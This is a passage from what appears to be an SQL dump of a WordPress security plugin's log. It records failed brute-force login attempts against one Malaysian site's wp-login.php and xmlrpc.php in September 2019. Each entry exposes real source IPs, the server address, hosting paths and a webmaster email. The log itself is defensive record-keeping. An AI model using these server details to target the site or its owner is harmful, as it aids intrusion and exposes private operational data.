Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"202.92.6.147\";s:11:\"REMOTE_PORT\";s:5:\"48778\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXWUfzRHzbqnR4rnNSSLNQAAAlc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567986815.825\";s:12:\"REQUEST_TIME\";s:10:\"1567986815\";}}','notice','2019-09-08 23:53:40','2019-09-08 23:53:36',18321648,19602912,'https://bintara.com.my/xmlrpc.php',1,0,'202.92.6.147'),(23720,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.240.33.34\";s:11:\"REMOTE_PORT\";s:5:\"34028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXWj2PATpeMTblrIf6HZ2gAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567990744.1618\";s:12:\"REQUEST_TIME\";s:10:\"1567990744\";}}','notice','2019-09-09 00:59:05','2019-09-09 00:59:04',17697472,19187384,'https://bintara.com.my/wp-login.php',1,0,'34.240.33.34'),(23721,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.240.33.34\";s:11:\"REMOTE_PORT\";s:5:\"34594\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXWj3a3aGPoCGLmCE1NtXQAAAYQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567990749.2428\";s:12:\"REQUEST_TIME\";s:10:\"1567990749\";}}','notice','2019-09-09 00:59:10','2019-09-09 00:59:09',18215088,19514520,'https://bintara.com.my/xmlrpc.php',1,0,'34.240.33.34'),(23722,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"58186\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXXmZx2RFgzM9HvMshpKyQAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568007783.3901\";s:12:\"REQUEST_TIME\";s:10:\"1568007783\";}}','notice','2019-09-09 05:43:04','2019-09-09 05:43:03',17700816,19191752,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250'),(23723,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"58470\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXXmaZJPYG21U6Xd-oIiWwAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568007785.4573\";s:12:\"REQUEST_TIME\";s:10:\"1568007785\";}}','notice','2019-09-09 05:43:06','2019-09-09 05:43:05',18215832,19511560,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.133.250'),(23724,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"15434\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXYsBTRHzbqnR4rnNSSpEQAAAkI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568025605.3192\";s:12:\"REQUEST_TIME\";s:10:\"1568025605\";}}','notice','2019-09-09 10:40:06','2019-09-09 10:40:05',17696864,19187552,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(23725,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"15794\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXYsCEgM-KacsfRowV1K6wAAAtc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568025608.4622\";s:12:\"REQUEST_TIME\";s:10:\"1568025608\";}}','notice','2019-09-09 10:40:09','2019-09-09 10:40:08',18216776,19511240,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.190.85'),(24747,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.100.67.78\";s:11:\"REMOTE_PORT\";s:5:\"50102\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFMuY75s89pqgR69SLWQgAAAYk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568754873.5611\";s:12:\"REQUEST_TIME\";s:10:\"1568754873\";}}','notice','2019-09-17 21:14:35','2019-09-17 21:14:34',18256496,19556512,'https://bintara.com.my/xmlrpc.php',1,0,'185.100.67.78'),(24748,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"159.65.69.32\";s:11:\"REMOTE_PORT\";s:5:\"33172\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFNFG4SfF9g@8lNlxwhjwAAAEg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568754965.0101\";s:12:\"REQUEST_TIME\";s:10:\"1568754965\";}}','notice','2019-09-17 21:16:06','2019-09-17 21:16:05',17740024,19231120,'https://bintara.com.my/wp-login.php',1,0,'159.65.69.32'),(24749,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 